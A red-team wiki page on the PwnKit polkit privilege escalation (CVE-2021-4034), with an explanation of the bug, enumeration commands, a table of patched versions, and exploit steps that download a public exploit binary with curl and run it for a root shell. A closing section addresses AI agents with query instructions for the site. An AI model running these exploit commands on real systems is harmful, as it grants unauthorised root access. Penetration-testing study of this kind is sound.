# PwnKit

## Theory

CVE-2021-4034 (pwnkit) was discovered by researchers at [Qualys](https://www.qualys.com/). The vulnerability has existed in every version of the "Policy Toolkit" (or, Polkit) package **since it was first released in 2009** and allows any unprivileged attacker to easily obtain full administrative access over any Linux machine with the Polkit package installed. **Polkit is installed by default on most distributions of Linux**, making this vulnerability *extremely* widespread. The Pwnkit vulnerability exists in the pkexec utility. The pkexec command is used by authorized users to execute commands at elevated privileges (like using sudo).

**Pkexec** attempts to parse any command-line arguments that we pass it using a for-loop, starting at the index 1 to offset the name of the program and obtain the first real argument. The name of the program is irrelevant to argument parsing, so the indexing is simply offset to ignore it. But if we don't provide any arguments, the index is permanently set to 1. This becomes a problem later when pkexec attempts to write to the value of the argument at index n. As there are no command-line arguments, there is no argument at index n — instead the program overwrites the next thing in memory, which just so happens to be the first value in the list of environment variables when the program is called using a C function called execve(). In other words, by passing pkexec a null list of arguments, we can **force it to** **overwrite an environment variable** instead! - [TryHackMe](https://tryhackme.com/room/pwnkit)

## Practice

{% tabs %}
{% tab title="Enumeration" %}
To make the PwnKit exploit working. The SUID bit on the pkexec binary must be set

```bash
$ find / -type f -name *pkexec* -perm -4000 2>/dev/null
/usr/bin/pkexec
```

Check if the policykit package is vulnerable

```bash
#Debian/Ubuntu
apt list --installed | grep -i polkit

#RHEL/CentOs/Fedora
rpm -qa | grep -i polkit

#SUE
zypper search -i polkit

#Oracle Linux
pkginfo | grep -i polkit
```

Here is a summary table of patched versions by OS. Earlier versions are vulnerable

<table><thead><tr><th width="228.5">OS Version</th><th>Patched version</th></tr></thead><tbody><tr><td>CentOS 7</td><td>polkit-0.112-26.el7_9.1</td></tr><tr><td>CentOS 8</td><td>polkit-0.115-13.el8_5.1</td></tr><tr><td>Debian 9</td><td>policykit-1_0.105-18+deb9u2</td></tr><tr><td>Debian 10</td><td>policykit-1_0.105-25+deb10u1</td></tr><tr><td>Debian 11</td><td>policykit-1_0.105-31+deb11u1</td></tr><tr><td>Oracle Linux 6</td><td>polkit-0.96-11.0.1.el6_10.1</td></tr><tr><td>Oracle Linux 7</td><td>polkit-0.112-26.0.1.el7_9.1</td></tr><tr><td>Oracle Linux 8</td><td>polkit-0.115-13.0.1.el8_5.1</td></tr><tr><td>SUSE Linux Enterprise Server 12</td><td>polkit-debugsource-0.113-5.24.1</td></tr><tr><td>SUSE Linux Enterprise Server 15 LTSS et SP1</td><td>polkit-debugsource-0.116-3.6.1</td></tr><tr><td>SUSE Linux Enterprise Server 15 SP2</td><td>polkit-debugsource-0.114-3.15.1</td></tr><tr><td>Red Hat 6</td><td>polkit-0.96-11.el6_10.2</td></tr><tr><td>Red Hat 7</td><td>polkit-0.112-26.el7_9.1</td></tr><tr><td>Red Hat 8</td><td>polkit-0.115-13.el8_5.1</td></tr><tr><td>Ubuntu 18.04</td><td>policykit-1-0.105-20ubuntu0.18.04.6</td></tr><tr><td>Ubuntu 20.04</td><td>policykit-1-0.105-26ubuntu1.2</td></tr><tr><td>Ubuntu 21.10</td><td>policykit-1-0.105-31ubuntu0.1</td></tr><tr><td>Fedora 34</td><td>polkit-0.117-3.fc34.2</td></tr><tr><td>Fedora 35</td><td>polkit-0.120-1.fc35.1</td></tr><tr><td>Anolis OS 7</td><td>polkit-0.112-26.an7.1</td></tr><tr><td>Anolis OS 8</td><td>polkit-0.115-13.an8_5.1</td></tr><tr><td>Alibaba Cloud Linux 2</td><td>polkit-0.112-26.3.al7.1</td></tr><tr><td>Alibaba Cloud Linux 3</td><td>polkit-0.115-13.al8.1</td></tr></tbody></table>
{% endtab %}

{% tab title="Exploit" %}
We can use [this exploit](https://github.com/ly4k/PwnKit) made by ly4k. It should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

```bash
#Run the exploit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit        # interactive shell
./PwnKit 'id'   # single command

# Or you may want to compile it by yourself
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
```

Alternativly, we can use [this exploit](https://github.com/arthepsy/CVE-2021-4034) made by arthepsy

```bash
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
```

{% endtab %}
{% endtabs %}

## Ressource

{% embed url="<https://ine.com/blog/exploiting-pwnkit-cve-20214034>" %}

{% embed url="<https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034>" %}

{% embed url="<https://tryhackme.com/room/pwnkit>" %}

{% embed url="<https://cyberwatch.fr/cve/cve-2021-4034/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/redteam/privilege-escalation/linux/polkit-exploits/pwnkit.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.